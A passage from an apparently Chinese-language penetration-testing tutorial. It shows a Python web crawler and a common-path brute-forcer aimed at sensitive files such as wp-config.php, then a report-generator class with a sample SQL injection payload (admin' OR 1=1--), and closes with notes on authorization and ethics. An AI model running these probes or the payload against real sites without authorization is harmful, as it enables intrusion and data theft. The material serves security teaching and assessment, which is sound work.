        passed to ``analyze_form``.

        Returns:
            A list of the URLs fetched successfully so far.
        """
        from collections import deque
        queue = deque([(self.target, 0)])
        seen = {self.target}
        while queue:
            current_url, depth = queue.popleft()
            if depth > max_depth:
                continue
            try:
                response = self.session.get(current_url, timeout=10)
                self.found_urls.add(current_url)
                if not response.headers.get('content-type', '').startswith('text/html'):
                    continue
                soup = BeautifulSoup(response.content, 'html.parser')
                for link in soup.find_all('a', href=True):
                    full_url = self._same_site_url(current_url, link['href'])
                    if full_url and full_url not in seen:
                        seen.add(full_url)
                        queue.append((full_url, depth + 1))
                for form in soup.find_all('form'):
                    self.analyze_form(current_url, form)
            except Exception as e:
                print(f"Error crawling {current_url}: {e}")
        return list(self.found_urls)

    def analyze_form(self, page_url, form):
        """Build default form data for ``form`` and run the form tests."""
        method = form.get('method', 'get').lower()
        form_url = urljoin(page_url, form.get('action', ''))
        form_data = {}
        for input_field in form.find_all('input'):
            name = input_field.get('name', '')
            if not name:
                # A nameless input is never submitted by a browser.
                continue
            if input_field.get('type', 'text') in ['submit', 'button', 'hidden']:
                continue
            form_data[name] = input_field.get('value', '') or 'test'
        self.test_form_vulnerabilities(form_url, form_data, method)

    def test_form_vulnerabilities(self, form_url, form_data, method):
        """Run the SQL injection, XSS and CSRF form checks in order."""
        self.test_sql_injection_form(form_url, form_data, method)
        self.test_xss_form(form_url, form_data, method)
        self.test_csrf(form_url, form_data, method)

    # ------------------------------------------------------------------
    # Extension hooks. The original code called these three methods
    # without defining them; the resulting AttributeError was swallowed
    # by crawl_website and reported as a crawl error. The defaults do
    # nothing; subclasses supply the checks and append their findings to
    # ``self.vulnerabilities``.
    # ------------------------------------------------------------------
    def test_sql_injection_form(self, form_url, form_data, method):
        """Hook: SQL injection check for one form (default: no-op)."""

    def test_xss_form(self, form_url, form_data, method):
        """Hook: XSS check for one form (default: no-op)."""

    def test_csrf(self, form_url, form_data, method):
        """Hook: CSRF check for one form (default: no-op)."""

    def _probe(self, url, resource_type):
        """Return a resource record if ``url`` answers 200, else None."""
        try:
            response = self.session.get(url, timeout=5)
        except requests.RequestException:
            return None
        if response.status_code != 200:
            return None
        found = {
            'type': resource_type,
            'url': url,
            'status_code': response.status_code
        }
        if resource_type == 'file':
            found['size'] = len(response.content)
        return found

    def directory_bruteforce(self):
        """Request common directory and file names; return those answering 200."""
        common_dirs = [
            'admin', 'administrator', 'login', 'wp-admin', 'phpmyadmin',
            'backup', 'test', 'dev', 'staging', 'api', 'uploads',
            'images', 'css', 'js', 'includes', 'config', 'database'
        ]
        common_files = [
            'robots.txt', 'sitemap.xml', '.htaccess', 'web.config',
            'config.php', 'database.php', 'wp-config.php', 'readme.txt',
            'changelog.txt', 'version.txt', 'phpinfo.php'
        ]
        candidates = [(urljoin(self.target, d + '/'), 'directory') for d in common_dirs]
        candidates += [(urljoin(self.target, f), 'file') for f in common_files]
        found_resources = []
        for url, resource_type in candidates:
            found = self._probe(url, resource_type)
            if found is not None:
                found_resources.append(found)
        return found_resources

    def run_comprehensive_test(self):
        """Crawl, brute-force common paths and return a report dict."""
        print(f"[+] Starting comprehensive test for {self.target}")
        print("[+] Crawling website...")
        crawled_urls = self.crawl_website()
        print(f"[+] Found {len(crawled_urls)} URLs")
        print("[+] Directory bruteforcing...")
        found_resources = self.directory_bruteforce()
        print(f"[+] Found {len(found_resources)} additional resources")
        report = {
            'target': self.target,
            'crawled_urls': crawled_urls,
            'found_resources': found_resources,
            'vulnerabilities': self.vulnerabilities,
            'timestamp': time.strftime('%Y-%m-%d %H:%M:%S')
        }
        return report
渗透测试报告
报告结构模板
# 渗透测试报告生成器
from datetime import datetime
import json
class PenetrationTestReport:
    """Assemble a penetration test report and export it.

    ``project_info`` is a dict supplied by the caller. The methods read
    the keys ``project_name``, ``client_name``, ``target``, ``start_date``,
    ``end_date`` and ``testers``.
    """

    SEVERITY_ORDER = {'Critical': 0, 'High': 1, 'Medium': 2, 'Low': 3}
    SUPPORTED_FORMATS = ('markdown', 'json')

    def __init__(self, project_info):
        self.project_info = project_info
        self.executive_summary = ""
        self.vulnerabilities = []
        self.recommendations = []
        self.appendices = []

    def generate_executive_summary(self, findings):
        """Build the executive summary from ``findings``.

        The text is stored in ``self.executive_summary`` and also returned.

        Args:
            findings: iterable of dicts that each carry a ``severity`` key.
        """
        from collections import Counter
        findings = list(findings)
        counts = Counter(v['severity'] for v in findings)
        # High findings also warrant the urgent wording. The original checked
        # only Critical, so a report with High findings still said the overall
        # security posture was good.
        if counts['Critical'] > 0 or counts['High'] > 0:
            risk_statement = '系统存在严重安全风险,建议立即采取修复措施。'
        else:
            risk_statement = '系统整体安全状况良好,建议按优先级修复发现的问题。'
        info = self.project_info
        lines = [
            "",
            "# 执行摘要",
            "## 测试概述",
            f"本次渗透测试于{info['start_date']}至{info['end_date']}期间对{info['target']}进行了全面的安全评估。",
            "## 主要发现",
            f"测试过程中共发现{len(findings)}个安全问题:",
            f"- 严重漏洞:{counts['Critical']}个",
            f"- 高危漏洞:{counts['High']}个",
            f"- 中危漏洞:{counts['Medium']}个",
            f"- 低危漏洞:{counts['Low']}个",
            "## 风险评估",
            risk_statement,
            "## 建议优先级",
            "1. 立即修复所有严重和高危漏洞",
            "2. 在下一个维护窗口修复中危漏洞",
            "3. 制定计划逐步修复低危漏洞",
            "4. 建立定期安全评估机制",
            "",
        ]
        self.executive_summary = "\n".join(lines)
        return self.executive_summary

    def add_vulnerability(self, vuln_info):
        """Append a finding and give it a sequential ``VULN-NNN`` id.

        Raises:
            KeyError: if a required key (title, severity, description,
                impact, affected_systems, remediation) is missing.
        """
        vulnerability = {
            'id': f"VULN-{len(self.vulnerabilities) + 1:03d}",
            'title': vuln_info['title'],
            'severity': vuln_info['severity'],
            'cvss_score': vuln_info.get('cvss_score', 0),
            'description': vuln_info['description'],
            'impact': vuln_info['impact'],
            'affected_systems': vuln_info['affected_systems'],
            'proof_of_concept': vuln_info.get('proof_of_concept', ''),
            'remediation': vuln_info['remediation'],
            'references': vuln_info.get('references', [])
        }
        self.vulnerabilities.append(vulnerability)

    def generate_vulnerability_details(self):
        """Return the Markdown detail section, most severe findings first."""
        sorted_vulns = sorted(
            self.vulnerabilities,
            key=lambda v: self.SEVERITY_ORDER.get(v['severity'], len(self.SEVERITY_ORDER)),
        )
        # Collect the sections and join once instead of repeated +=.
        sections = ["# 漏洞详情\n\n"]
        for vuln in sorted_vulns:
            references = "\n".join(f"- {ref}" for ref in vuln['references'])
            sections.append("\n".join([
                "",
                f"## {vuln['id']}: {vuln['title']}",
                f"**严重性**: {vuln['severity']} (CVSS: {vuln['cvss_score']})",
                f"**影响系统**: {', '.join(vuln['affected_systems'])}",
                "### 描述",
                vuln['description'],
                "### 影响",
                vuln['impact'],
                "### 复现步骤",
                vuln['proof_of_concept'],
                "### 修复建议",
                vuln['remediation'],
                "### 参考资料",
                references,
                "---",
                "",
            ]))
        return "".join(sections)

    def generate_full_report(self):
        """Return the complete report as a Markdown string."""
        info = self.project_info
        lines = [
            "",
            "# 渗透测试报告",
            f"**项目**: {info['project_name']}",
            f"**客户**: {info['client_name']}",
            f"**测试日期**: {info['start_date']} - {info['end_date']}",
            f"**报告日期**: {datetime.now().strftime('%Y-%m-%d')}",
            f"**测试人员**: {', '.join(info['testers'])}",
            self.executive_summary,
            "# 测试方法",
            "本次渗透测试采用了以下方法:",
            "- 信息收集和侦察",
            "- 漏洞扫描和分析",
            "- 漏洞利用和验证",
            "- 后渗透测试",
            "- 风险评估和报告",
            "测试遵循OWASP测试指南和PTES标准,确保测试的全面性和准确性。",
            self.generate_vulnerability_details(),
            "# 总体建议",
            "## 短期建议(1-30天)",
            "- 立即修复所有严重和高危漏洞",
            "- 实施临时缓解措施",
            "- 加强监控和日志记录",
            "## 中期建议(1-3个月)",
            "- 修复中危漏洞",
            "- 实施安全培训计划",
            "- 建立漏洞管理流程",
            "## 长期建议(3-12个月)",
            "- 建立定期安全评估机制",
            "- 实施安全开发生命周期",
            "- 持续改进安全态势",
            "# 结论",
            "本次渗透测试全面评估了目标系统的安全状况,发现了多个需要关注的安全问题。建议客户按照优先级逐步修复这些问题,并建立持续的安全改进机制。",
            "我们建议在修复完成后进行复测,以验证修复效果。同时,建议建立定期的安全评估机制,以持续监控和改进系统的安全状况。",
            "",
        ]
        return "\n".join(lines)

    def export_report(self, format='markdown'):
        """Write the report to a dated file in the working directory.

        Args:
            format: ``'markdown'`` or ``'json'``. The name shadows the
                builtin but is kept so existing keyword callers still work.

        Returns:
            The name of the file written.

        Raises:
            ValueError: if ``format`` is not supported. The original fell
                through to ``return filename`` with the name unbound.
        """
        if format not in self.SUPPORTED_FORMATS:
            raise ValueError(
                f"Unsupported report format: {format!r} "
                f"(expected one of {', '.join(self.SUPPORTED_FORMATS)})"
            )
        now = datetime.now()
        stamp = now.strftime('%Y%m%d')
        if format == 'markdown':
            filename = f"pentest_report_{stamp}.md"
            report_content = self.generate_full_report()
            with open(filename, 'w', encoding='utf-8') as f:
                f.write(report_content)
        else:
            filename = f"pentest_report_{stamp}.json"
            report_data = {
                'project_info': self.project_info,
                'executive_summary': self.executive_summary,
                'vulnerabilities': self.vulnerabilities,
                'generated_at': now.isoformat()
            }
            with open(filename, 'w', encoding='utf-8') as f:
                json.dump(report_data, f, indent=2, ensure_ascii=False)
        return filename
# 使用示例
# Usage example: build a one-finding report and export it as Markdown.
project_info = dict(
    project_name='Web Application Security Assessment',
    client_name='Example Corp',
    target='https://example.com',
    start_date='2023-10-01',
    end_date='2023-10-05',
    testers=['Security Analyst 1', 'Security Analyst 2'],
)
report = PenetrationTestReport(project_info)

# Register the finding
report.add_vulnerability(dict(
    title='SQL Injection in Login Form',
    severity='High',
    cvss_score=8.1,
    description='The login form is vulnerable to SQL injection attacks.',
    impact='An attacker could bypass authentication and access sensitive data.',
    affected_systems=['https://example.com/login.php'],
    proof_of_concept=(
        "1. Navigate to login form\n"
        "2. Enter payload: admin' OR 1=1--\n"
        "3. Observe successful login"
    ),
    remediation='Use parameterized queries and input validation.',
    references=['https://owasp.org/www-community/attacks/SQL_Injection'],
))

# Summarise the findings, then write the report file
report.generate_executive_summary(report.vulnerabilities)
report_file = report.export_report('markdown')
print(f"Report generated: {report_file}")
最佳实践和注意事项
法律和道德考虑
- 授权测试:确保获得明确的书面授权
- 范围限制:严格遵守测试范围和限制
- 数据保护:保护客户敏感信息
- 负责任披露:遵循负责任的漏洞披露原则
技术最佳实践
- 全面测试:覆盖所有可能的攻击向量
- 文档记录:详细记录测试过程和发现
- 验证漏洞:确保发现的漏洞是真实可利用的
- 风险评估:准确评估漏洞的风险等级
报告质量
- 清晰表达:使用清晰、专业的语言
- 技术细节:提供足够的技术细节
- 修复建议:提供具体、可行的修复建议
- 优先级排序:按风险等级排序漏洞
总结
渗透测试是评估系统安全性的重要手段,需要系统性的方法论、专业的技能和合适的工具。通过遵循标准化的测试流程,使用自动化工具辅助手工测试,并生成高质量的报告,可以有效地发现和修复安全漏洞,提高系统的整体安全水平。
渗透测试不仅是技术活动,更是一个需要持续学习和改进的过程。测试人员应该不断更新知识和技能,关注最新的攻击技术和防护方法,以应对不断演变的安全威胁。
> 评论区域 (1 条)
发表评论